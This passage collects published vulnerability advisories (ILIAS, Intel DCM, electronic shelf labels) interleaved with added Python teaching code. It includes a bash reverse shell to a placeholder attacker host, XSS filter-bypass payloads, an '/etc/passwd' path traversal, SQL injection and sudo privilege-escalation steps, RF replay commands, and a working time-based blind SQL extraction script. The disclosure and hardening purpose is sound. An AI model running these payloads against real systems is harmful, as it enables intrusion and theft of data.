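            + '" method="post"><div class="fieldLabel">Member ID</div></form>')


def render_safe(destination: str) -> str:
    """Encode for each context, innermost first: the value is a URL query component,
    so percent-encode it; the URL then sits in an HTML attribute, so HTML-escape that.
    html.escape(quote=True) also turns '"' into '&quot;', which ends the breakout."""
    url = "index.php?p=member&destination=" + quote(destination, safe="")
    return ('<form action="' + html.escape(url, quote=True)
            + '" method="post"><div class="fieldLabel">Member ID</div></form>')


class _TagWalker(HTMLParser):
    """Records what a browser's tokenizer would see: script elements and attribute values."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0
        self.attrs = {}  # (tag, attribute) -> value after entity decoding

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        for name, value in attrs:
            self.attrs[(tag, name)] = value or ""


def analyse(document: str) -> dict:
    walker = _TagWalker()
    walker.feed(document)
    walker.close()
    return {"script_tags": walker.script_tags, "attrs": walker.attrs}


def reflected_unencoded(document: str, probe: str) -> bool:
    """The check behind the advisories' 'echoed unmodified': the probe appears verbatim."""
    return probe in document


def form_action(document: str) -> str:
    """The action attribute the browser actually ends up with."""
    return analyse(document)["attrs"].get(("form", "action"), "")


if __name__ == "__main__":
    for label, doc in (("unsafe", render_unsafe(PROBE)), ("safe", render_safe(PROBE))):
        info = analyse(doc)
        print(label, "| script tags:", info["script_tags"],
              "| probe verbatim:", reflected_unencoded(doc, PROBE),
              "| action:", form_action(doc))
```

In the unsafe rendering the tokenizer closes the form tag at the probe's `">` and then sees a real script element; the action attribute is truncated to `...destination=zbuip`. In the safe rendering the whole probe survives as part of the URL, percent-encoded, and no script element exists. HTML-escaping alone would also stop the breakout, but percent-encoding is what a URL query component needs, and the outer HTML escape is what the attribute context needs; applying both, inner first, is the general rule.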
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221206-0 ><br />=======================================================================<br /> title: Multiple critical vulnerabilities<br /> product: ILIAS eLearning platform<br /> vulnerable version: <= 7.15<br /> fixed version: 7.16<br /> CVE number: CVE-2022-45915, CVE-2022-45916, CVE-2022-45917,<br /> CVE-2022-45918<br /> impact: critical<br /> homepage: https://www.ilias.de<br /> found: 2022-09-30<br /> by: Anna Hartig (Office Bochum)<br /> Constantin Schwarz (Office Bochum)<br /> Niklas Schilling (Office Munich)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Around since 1998, ILIAS is a powerful learning management system that fulfills<br />all your requirements. Using its integrated tools, small and large businesses,<br />universities, schools and public authorities are able to create tailored,<br />individual learning scenarios."<br /><br />Source: https://www.ilias.de/en/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />SEC Consult highly recommends performing a thorough security review of the product,<br />conducted by security professionals, to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Authenticated Direct OS Command Injection - CVE-2022-45915<br />ILIAS utilizes several third-party programs to perform tasks like creating PDF<br />files or scanning uploaded files for known viruses. These are called using the<br />PHP exec() function. 
In several instances, the arguments passed to the exec()<br />function contain user input that is not properly sanitized.<br />By performing malicious configuration steps or uploading dangerous files, an<br />attacker can execute arbitrary system commands with the rights of the web server<br />user (www-data).<br />The privileges required for the different instances of command injection range<br />from low rights to admin rights.<br /><br /><br />2) Stored Cross-Site Scripting - CVE-2022-45916<br />Multiple stored cross-site scripting vulnerabilities were identified in ILIAS<br />course items. These were either achieved by bypassing existing XSS filters or<br />simply by exploiting missing input validation altogether. This results in the<br />execution of attacker-controlled JavaScript code by the user's browser.<br />The attacker requires the right to create course items, e.g., as a tutor of a<br />course.<br /><br /><br />3) Local File Inclusion - CVE-2022-45918<br />The included SCORM editor features a debugger that gives authors insights into<br />the current SCORM player session, as well as previous sessions. When accessing<br />the logs of previous sessions, the debugger fails to validate the requested<br />file path, allowing arbitrary files on the server to be read.<br /><br /><br />4) Open Redirect - CVE-2022-45917<br />The script shib_logout.php redirects the user to a URL specified in the<br />"return" parameter. Since this parameter is not validated, an attacker can use<br />it to redirect a victim to an arbitrary website. 
This is a powerful tool in<br />phishing campaigns, as it allows hiding the malicious webpage behind a link that<br />looks like it would take you to the real ILIAS webpage.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Authenticated Direct OS Command Injection - CVE-2022-45915<br />Multiple instances of command injection vulnerabilities were identified:<br /><br />a) ZIP archive upload<br />Normal users with open assessments can submit their solution by uploading a ZIP<br />archive. These archives are extracted on the server and scanned for viruses<br />recursively. The directory and file names can be used by an attacker to inject<br />system commands, e.g., by including a directory with the name<br />$(touch /tmp/pwned) to the ZIP archive. Exploiting this vulnerability, an attacker<br />is able to get a reverse shell on the ILIAS webserver with the rights of the<br />web server user (www-data).<br /><br /><br />b) Media object creation<br />ILIAS can be configured so that users can create media objects based on files<br />inside an "Upload Directory". Before these objects are created, the files are<br />scanned for viruses. The file names can be used by an attacker to inject system<br />commands. By placing a file with a name like $(touch /tmp/pwned) inside the<br />upload directory and then creating a media object based on it, an attacker is<br />able to execute arbitrary system commands with the rights of www-data on the<br />server.<br /><br /><br />c) PDF document creation<br />ILIAS provides users the functionality to export content as PDF files. A user<br />with admin rights can configure the path to the preferred PDF renderer. An<br />attacker can use this parameter to inject system commands. Due to missing<br />input validation it is possible to inject multiple commands. The path to<br />wkhtmltopdf has to be included in the payload, as ILIAS checks for it. 
By<br />changing the path to:<br /><br />/usr/local/bin/wkhtmltopdf; bash -c "bash -i >& /dev/tcp/<IP_Address_Attacker>/13373 0>&1";<br /><br />an attacker can open a reverse shell with the rights of www-data that connects<br />to the attacker's machine on port 13373. The reverse shell is initiated when<br />the export function is triggered.<br />No PDF renderer has to be installed for this vulnerability to be exploitable.<br /><br /><br />2) Stored Cross-Site Scripting - CVE-2022-45916<br />Multiple instances of stored cross-site scripting were identified:<br /><br />a) Several Stored XSS Attacks in Tests<br />An attacker must be able to create new tests in which the JavaScript code will<br />be embedded. If a victim then later accesses one of those tests, the XSS payload will<br />be triggered. The "Question" input field of a test has a filter in place, which<br />correctly removes HTML tags such as <script> or<br /><img src="x" onerror="alert(document.cookie)">. By making use of half open HTML<br />tags, this filter can be successfully bypassed. E.g.<br /><br /><img src="x" onerror="alert(document.cookie)"<br /><br />This half open HTML tag can also be used in the "Introductory Message" of a test<br />to trigger an XSS. 
It is important to end the JavaScript code with a quotation<br />mark or a space so that it is properly separated from the HTML tags that<br />follow once it is embedded into a test.<br /><br />Finally, the "Question" input field of the question type "Long Menu" was<br />found to apply no filtering at all, allowing the unrestricted use of<br />arbitrary HTML tags such as <script>.<br /><br /><br />b) Stored XSS in title of course items<br />An attacker with rights to create an arbitrary course item can conduct a stored<br />XSS attack by setting the title of the element to:<br /><br />" onclick="alert(document.cookie)"<br /><br />When a user clicks on the button to the right of the title, the XSS payload is<br />triggered.<br /><br /><br />c) Stored XSS in HTML sites<br />An attacker with rights to edit an HTML Learning Module can conduct a stored<br />XSS attack, as it is allowed to insert JavaScript code into the HTML page. Even<br />if this behavior is intended, it is insecure and considered bad practice.<br /><br /><br />3) Local File Inclusion - CVE-2022-45918<br />As a prerequisite, the SCORM debugger must be enabled for the whole ILIAS<br />platform. An attacker with access to a SCORM player can open the SCORM<br />debugger and request the logs of a previous session. By changing the value of<br />the "logFile" query parameter of the request, they can read arbitrary<br />files on the server's filesystem. 
For example, to read the passwd file<br />on Linux systems, an attacker can change the value of the parameter "logFile"<br />to "../../../../../../../../../etc/passwd".<br /><br /><br />4) Open Redirect - CVE-2022-45917<br />The shib_logout function is vulnerable to an open redirect.<br />A URL that successfully uses this vulnerability to redirect to<br />"https://www.sec-consult.com" is:<br /><br />http://ILIAS-URL/shib_logout.php?action=logout&return=https://www.sec-consult.com<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The vulnerabilities were identified in ILIAS version 7.14.<br />However, a brief analysis of the source code suggests that several<br />vulnerabilities are present in versions dating back to at least 3.8.4.<br />Hence, it is assumed that most current versions of the product are affected.<br /><br />The vulnerabilities were partly fixed in version 7.15; a complete fix is<br />available in version 7.16.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-10-07: Contacting vendor through security@lists.ilias.de<br />2022-10-19: Sending initial email again, as the vendor did not yet respond<br />2022-10-25: Extending email recipients to info@ilias.de, datenschutz@ilias.de and<br /> identified personal email addresses from the vendor's website.<br />2022-10-25: Sending the advisory to the provided contact<br />2022-10-31: Vendor requests more information<br />2022-10-31: Sending detailed PoC<br />2022-11-10: Asking for current status<br />2022-11-22: Vendor confirms that patches will be available by 2022-11-26<br />2022-11-22: Asking about the version numbers of mentioned patches and CVE IDs<br />2022-11-23: Vendor provides information about patched versions; CVE IDs will be<br /> requested by SEC Consult<br />2022-11-24: Vendor releases patched version 7.16<br />2022-12-06: Public release of security advisory<br /><br /><br />Solution:<br />---------<br />Update ILIAS to 
version 7.16 or newer from the vendor's website:<br />https://docu.ilias.de/goto.php?target=st_229<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF A. Hartig, C. Schwarz, N. Schilling / @2022<br /><br /></code></pre>
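The following is an added example and not ILIAS code: constructed "vulnerable" and "hardened" handlers for three of the flaws in the ILIAS advisory above, namely the stored XSS through a tag-stripping filter and an unquoted attribute (2a/2b), the "logFile" path traversal (3) and the "return" open redirect (4). The filter regex, the HTML templates, LOG_ROOT and ALLOWED_HOSTS are hypothetical stand-ins for whatever the real application does; the half-open `<img` payload and the `" onclick=` title are the advisory's own. An HTML parser is used to show which rendered output actually carries an on* handler, which is why the half-open tag survives the stripping filter and swallows the closing `</p>`.

```python
import html
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# --- 2) stored XSS ------------------------------------------------------------
_COMPLETE_TAG = re.compile(r"<[^>]*>")   # hypothetical filter: only matches tags closed by '>'

def render_question_filtered(question):
    """Vulnerable: strips complete tags, then splices the text into the page.
    A half-open tag (no closing '>') survives, and the browser closes it at
    the next '>' it finds, i.e. it swallows the </p> that follows."""
    return '<p class="q">%s</p><button>Next</button>' % _COMPLETE_TAG.sub("", question)

def render_title_raw(title):
    """Vulnerable: attribute context with no quote escaping (course item title)."""
    return '<input type="button" value="%s">' % title

def render_encoded(question, title):
    """Hardened: encode for the output context instead of trying to strip markup."""
    return ('<p class="q">%s</p><input type="button" value="%s">'
            % (html.escape(question), html.escape(title, quote=True)))

class _HandlerFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        self.found += [(tag, name) for name, _ in attrs if name.startswith("on")]

def event_handlers(markup):
    """(tag, attribute) pairs that an HTML parser sees as on* event handlers."""
    p = _HandlerFinder()
    p.feed(markup)
    p.close()
    return p.found

# --- 3) logFile path traversal -----------------------------------------------
LOG_ROOT = "/var/www/ilias/data/scorm_logs"   # hypothetical log directory

def resolve_log_file(name, root=LOG_ROOT):
    """Hardened: the joined, normalised path must stay inside root. This rejects
    '../' chains and absolute names alike (os.path.join would otherwise let
    '/etc/passwd' replace root entirely)."""
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("logFile outside log directory: %r" % name)
    return candidate

# --- 4) return open redirect --------------------------------------------------
ALLOWED_HOSTS = {"ilias.example.org"}   # hypothetical allow-list

def safe_return_url(value, default="/login.php"):
    """Hardened: accept only a local path or an absolute URL to an allow-listed
    host; anything else (other hosts, '//evil', userinfo tricks) falls back."""
    parts = urlsplit(value)
    if not parts.scheme and not parts.netloc and value.startswith("/") and not value.startswith("//"):
        return value
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return value
    return default
```

`event_handlers()` makes the advisory's remark about ending the payload with a quote or space concrete: the browser (and `HTMLParser`) keeps reading attributes until the first `>`, so the stripped-but-half-open `<img` absorbs the following `</p>` and its `onerror` remains live, while the encoded output contains no tag at all.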
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Intel Data Center Manager<br />Vendor URL: https://www.intel.com/content/www/us/en/developer/tools/data-center-manager-console/overview.html<br />Type: SQL Injection [CWE-89]<br />Date found: 2022-01-21<br />Date published: 2022-12-01<br />CVSSv3 Score: 9.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)<br />CVE: CVE-2022-21225<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Intel Data Center Manager 4.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Energy costs are the fastest rising expense for today’s data centers. Intel® Data<br />Center Manager (Intel® DCM) provides real-time power and thermal consumption data,<br />giving you the clarity you need to lower power usage, increase rack density, and<br />prolong operation during outages.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />Intel DCM's endpoint at "/DcmConsole/DataAccessServlet?action=getRoomRackData" is<br />vulnerable to an authenticated, blind SQL Injection when user-supplied input to<br />the HTTP POST parameter "dataName" is processed by the web application.<br /><br />Since the application does not properly validate and sanitize this parameter, an<br />attacker can inject arbitrary SQL commands against the PostgreSQL backend<br />database server of the web application.<br /><br />Successful exploits can allow an authenticated attacker (the lowest possible<br />authorization level "Guest" is sufficient) to read and modify database contents<br />and execute any system commands on the underlying operating system. 
This way,<br />the attacker can compromise the system's entire confidentiality, integrity, and<br />availability.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />POST /DcmConsole/DataAccessServlet?action=getRoomRackData HTTP/1.1<br />Host: [ip-address]<br />Cookie: JSESSIONID=[session-id]<br />Content-Length: 153<br />Accept: application/json, text/plain, */*<br />Content-Type: text/plain<br />User-Agent: Mozilla/5.0<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Connection: close<br /><br />{"antiCSRFId":"[your-anti-csrf-id]","requestObj":{"snapshotId":1,"roomId":1,"dataName":"test');SELECT PG_SLEEP(5)--"}}<br /><br />(see the referenced blog post for more details)<br /><br /><br />7. SOLUTION<br />===========<br />Update at least to version 5.0.0.46307.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-01-21: Discovery of the vulnerability<br />2022-01-21: Reported to vendor via their bug bounty program<br />2022-01-21: Vendor response: Sent to "appropriate reviewers"<br />2022-02-08: Vendor acknowledges the vulnerability with a severity of "medium" without sharing their CVSS calculation<br />2022-02-15: Endless back-and-forth discussions about the rating. Vendor proposes a rating of 6.8<br />2022-02-16: I don't accept the rating because the vendor downplayed it<br />2022-02-25: After discussions, vendor rates issue as CVSS 9.0 (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)<br />2022-02-25: Apparently AV:A is still wrong, but I don't have more energy to fight them. However this advisory contains the proper CVSS rating.<br />2022-xx-xx: Vendor releases version 5.0.0.46307 which includes the fix<br />2022-08-09: Vendor releases advisory INTEL-SA-00662<br />2022-12-01: Public disclosure<br /><br /><br />9. 
REFERENCES<br />==============<br />https://www.rcesecurity.com/2022/12/from-zero-to-hero-part-2-intel-dcm-sql-injection-to-rce-cve-2022-21225/<br />https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00662.html<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
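As an added example (not Intel's code and not the advisory's PoC), the block below shows what the `dataName` flaw looks like and what can be pulled through it. It uses a constructed sqlite3 stand-in for the DCM PostgreSQL backend: `pg_sleep()` is registered as a user-defined function that records the requested delay instead of sleeping, so the timing side channel that the `PG_SLEEP(5)` payload relies on can be observed without waiting. Table and column names are invented. Because `sqlite3.Cursor.execute()` refuses stacked statements, the extractor injects an in-statement `CASE ... THEN pg_sleep(5)` (the form sqlmap uses for PostgreSQL time-based blind) rather than the `');SELECT PG_SLEEP(5)--` of the PoC; the leak is the same one bit per request. The parameterised variant shows that the identical payload is then only ever a string value.

```python
import sqlite3

SLEEP_LOG = []   # every pg_sleep() call the "backend" was made to execute

def _fake_pg_sleep(seconds):
    SLEEP_LOG.append(seconds)   # a real backend would block here for `seconds`
    return 0

def make_db():
    """Constructed stand-in for the DCM database."""
    con = sqlite3.connect(":memory:")
    con.create_function("pg_sleep", 1, _fake_pg_sleep)
    con.executescript("""
        CREATE TABLE rack_data(room_id INTEGER, data_name TEXT, value REAL);
        INSERT INTO rack_data VALUES (1, 'power', 420.0), (1, 'thermal', 27.5);
        CREATE TABLE app_user(name TEXT, pw_hash TEXT);
        INSERT INTO app_user VALUES ('admin', '5f4dcc3b');
    """)
    return con

def room_rack_data_vulnerable(con, room_id, data_name):
    """Hypothetical sketch of the flaw: dataName is spliced into the SQL text,
    so a quote in it ends the literal and the remainder is parsed as SQL."""
    sql = ("SELECT value FROM rack_data WHERE room_id = %d AND data_name IN ('%s')"
           % (room_id, data_name))
    return [row[0] for row in con.execute(sql).fetchall()]

def room_rack_data_fixed(con, room_id, data_name):
    """Parameterised form: the payload never reaches the SQL parser as code."""
    cur = con.execute(
        "SELECT value FROM rack_data WHERE room_id = ? AND data_name IN (?)",
        (room_id, data_name))
    return [row[0] for row in cur.fetchall()]

def timing_oracle(con, condition):
    """One blind request: True if the backend was made to sleep, i.e. the
    injected condition held for at least one row of the original query."""
    before = len(SLEEP_LOG)
    payload = ("test') OR (CASE WHEN (%s) THEN pg_sleep(5) ELSE 0 END) = 1 -- "
               % condition)
    room_rack_data_vulnerable(con, 1, payload)
    return len(SLEEP_LOG) > before

def extract_string(con, inner_select, max_len=64):
    """Recover the result of inner_select one character at a time, binary
    searching each code point through the timing oracle (7 requests per
    character). sqlite's unicode() plays the role of P
ostgreSQL's ascii()."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if timing_oracle(con, "unicode(substr((%s), %d, 1)) > %d"
                             % (inner_select, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # substr() past the end yields '', unicode('') is NULL: no sleep
            break
        out += chr(lo)
    return out

if __name__ == "__main__":
    db = make_db()
    print(extract_string(db, "SELECT pw_hash FROM app_user WHERE name = 'admin'"))
```

The oracle only fires when the original query has at least one row to evaluate the `CASE` against, which is also true of the real time-based technique; that is why `room_id = 1` is used as a known-good value.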
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Intel Data Center Manager<br />Vendor URL: https://www.intel.com/content/www/us/en/developer/tools/data-center-manager-console/overview.html<br />Type: Incorrect Use of Privileged APIs [CWE-648]<br />Date found: 2022-07-16<br />Date published: 2022-12-07<br />CVSSv3 Score: 7.4 (CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)<br />CVE: -<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Intel Data Center Manager 5.1 (latest) and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Energy costs are the fastest rising expense for today’s data centers. Intel® Data<br />Center Manager (Intel® DCM) provides real-time power and thermal consumption data,<br />giving you the clarity you need to lower power usage, increase rack density, and<br />prolong operation during outages.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The latest version (5.1) and all prior versions of Intel's DCM are vulnerable to a<br />local privilege escalation via the application user "dcm", which is used to<br />run the web application and the REST interface. An attacker who gained RCE as<br />this dcm user (e.g., through Log4j) is then able to escalate their privileges to<br />root by abusing a weak sudo configuration for the "dcm" user:<br /><br />dcm ALL=(ALL) NOPASSWD:/usr/local/bin/SDPTool<br />dcm ALL=(ALL) NOPASSWD:/usr/bin/cp<br />dcm ALL=(ALL) NOPASSWD:/usr/bin/chmod<br /><br />The Intel Server Debug and Provisioning Tool (SDP Tool) must be installed for the<br />Data Center Manager to be vulnerable. Successful exploits can allow an authenticated<br />attacker to execute commands as root. 
In this way, the attacker can compromise the<br />victim system's entire confidentiality, integrity, and availability, and thereby<br />persist within the attached network.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />One way to exploit this is to replace the current sudoers configuration:<br /><br />1. Create a new sudoers configuration file as the compromised "dcm" user, e.g. in /tmp/<br />2. sudo chmod 440 /tmp/sudoers<br />3. sudo cp /tmp/sudoers /etc/sudoers<br />4. sudo /bin/bash<br /><br /><br />7. SOLUTION<br />===========<br />None. Intel does not consider this a vulnerability and therefore has not assigned<br />a CVE for it.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-07-16: Discovery of the vulnerability<br />2022-07-16: Reported to vendor via their bug bounty program<br />2022-07-18: Vendor response: Sent to "appropriate reviewers"<br />2022-07-26: Vendor states that the vulnerability "depends on something that does not exist (eg; RCE)."<br />2022-07-26: Sent a clarification that a compromise of the "dcm" account is indeed necessary, but there have been RCEs in the past (e.g. through Log4j)<br />2022-09-22: Vendor has trouble reproducing the bug and asks for another PoC<br />2022-09-22: Sent a clarification about the PoC<br />2022-09-22: Vendor states that the report "does not clearly demonstrate a vulnerability in DCM" and the report will be closed.<br />2022-09-23: Provided the vendor with a PoC utilizing Log4shell (CVE-2021-44228) in a former version of DCM<br />2022-10-10: Vendor asks whether the Log4shell bug is still reproducible in the latest version of DCM<br />2022-10-10: Made clear that Log4shell is not the point of the report<br />2022-10-11: Vendor states "We do not clearly see a vulnerability demonstrated in DCM"<br />2022-10-12: [Back and forth about the provided PoCs]<br />2022-10-12: I'm giving up.<br />2022-12-07: Public disclosure<br /><br /><br />9. 
REFERENCES<br />==============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
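The sudoers rules quoted in the advisory above are the kind of thing a configuration audit should catch before an attacker does. As an added example (not from the advisory or from Intel), the block below parses sudoers user specifications and flags NOPASSWD entries whose target binary gives root trivially, as `/usr/bin/cp` and `/usr/bin/chmod` do in the PoC (they are enough to overwrite `/etc/sudoers`). `ESCALATION_BINARIES` is a constructed excerpt, not a complete catalogue, and the sample sudoers text is constructed after the three rules in the advisory; `/usr/bin/ipmitool` is added as an example of a rule that passes.

```python
import re

# Constructed excerpt of binaries that hand over root when run via sudo
# (copy/chmod over /etc/sudoers, editors and pagers with shell escapes, shells).
ESCALATION_BINARIES = {
    "cp", "mv", "chmod", "chown", "tee", "dd", "install", "rsync", "tar",
    "bash", "sh", "dash", "zsh", "env", "find", "vi", "vim", "nano", "less",
    "more", "man", "python3", "perl", "awk", "systemctl", "apt", "apt-get",
}

# user  host = (runas) TAG: cmd, cmd ...
_RULE = re.compile(
    r"^(?P<user>[^\s#]+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+?)\s*$")

_SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")

def parse_sudoers(text):
    """One dict per (user, command) pair from the user-specification lines.
    Alias and Defaults lines are skipped; the rules above do not use them."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(_SKIP):
            continue
        m = _RULE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append({"user": m.group("user"), "host": m.group("host"),
                          "runas": m.group("runas") or "root",
                          "nopasswd": "NOPASSWD" in tags, "cmd": cmd.strip()})
    return rules

def audit(rules):
    """Return (user, cmd, reason) for every rule that deserves a second look."""
    findings = []
    for r in rules:
        if r["user"] == "root":            # root's own rules add no privilege
            continue
        prog = r["cmd"].split()[0]
        base = prog.rsplit("/", 1)[-1]
        if r["cmd"] == "ALL":
            reason = "unrestricted command"
        elif base in ESCALATION_BINARIES:
            reason = "%s can rewrite root-owned files or spawn a shell" % base
        elif not prog.startswith("/"):
            reason = "relative command path"
        else:
            continue
        if r["nopasswd"]:
            reason += " without a password"
        findings.append((r["user"], r["cmd"], reason))
    return findings

SAMPLE_SUDOERS = """\
# constructed sample modelled on the rules quoted in the advisory
Defaults env_reset
root ALL=(ALL:ALL) ALL
dcm ALL=(ALL) NOPASSWD:/usr/local/bin/SDPTool
dcm ALL=(ALL) NOPASSWD:/usr/bin/cp
dcm ALL=(ALL) NOPASSWD:/usr/bin/chmod
dcm ALL=(root) NOPASSWD: /usr/bin/ipmitool
"""

if __name__ == "__main__":
    for user, cmd, reason in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print("%-5s %-24s %s" % (user, cmd, reason))
```

Running it against the sample reports the `cp` and `chmod` rules and nothing else; whether `SDPTool` itself offers an escape is a separate question the list does not answer.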
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221201-0 ><br />=======================================================================<br /> title: Replay attacks & Displaying arbitrary contents<br /> product: Zhuhai Suny Technology ESL Tag / ETAG-TECH protocol<br /> (electronic shelf labels)<br /> vulnerable version: All<br /> fixed version: -<br /> CVE number: CVE-2022-45914<br /> impact: critical<br /> homepage: http://www.zhsuny.com/<br /> found: 2022-05-27<br /> by: Steffen Robertz (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Zhuhai Suny Technology Co., Ltd, founded in 2016 and located in Zhuhai<br />Guangdong, is the manufacturer of electronic shelf labels and Alibaba<br />Super Key Account Gold Supplier specializing in ESL with over 10 years’<br />experience focusing on helping customers reduce cost and boost sales.<br /><br />Since its founding, Suny has attached great importance to exploring<br />both international and domestic markets, thus becoming China’s top 1<br />manufacturer of electronic shelf labels. Its products have been widely<br />applied in supermarkets, retail stores, pharmacies, warehouses,<br />exhibitions, etc. We have provided services to customers from<br />more than 180 countries, and total sales in 2020 have exceeded<br />15 million US dollars."<br /><br />Source: http://www.zhsuny.com/profile/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor did not respond to our communication attempts; there is no patch<br />available. 
In case you are using the product, contact the vendor and urge<br />them to fix the security vulnerabilities.<br /><br />SEC Consult highly recommends a thorough security review of the product by<br />security professionals to identify and resolve potential further security<br />issues.<br /><br />The research has also been presented at security conferences such as<br />hardwear.io, under the title "Self-labeling electronic shelf labels".<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Replay Attack<br />The displayed information on the price tag is updated via a custom 433 MHz<br />protocol (called ETAG-TECH). An attacker can record the transmitted<br />RF samples and replay them later to cause the same action. Thus, it is<br />possible to restore an older price on the tag without any knowledge of the<br />protocol or the tag.<br /><br /><br />2) Forging ETAG-TECH protocol messages to display arbitrary content (CVE-2022-45914)<br />The ETAG-TECH protocol was reverse engineered. It has no authentication at<br />all. Hence, anyone can display arbitrary content on the electronic tag by<br />simply transmitting messages that follow the protocol.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Replay Attack<br />The tag and base station communicate at 433.264 MHz. Thus, the following<br />HackRF command can be used to record a transmission:<br />hackrf_transfer -r /tmp/old_price -f 433264000 -s 4000000 -a 1 -x 43 -l 16 -g 20<br /><br />The following command was used to replay the signal:<br />hackrf_transfer -t /tmp/old_price -f 433264000 -s 4000000 -a 1 -x 43 -l 16 -g 20<br /><br /><br />A video of the attack has been published here: https://youtu.be/hj_ao25HU1E<br /><br /><br />2) Forging ETAG-TECH protocol messages to display arbitrary content (CVE-2022-45914)<br />The base station transmits a compressed image to the tag. 
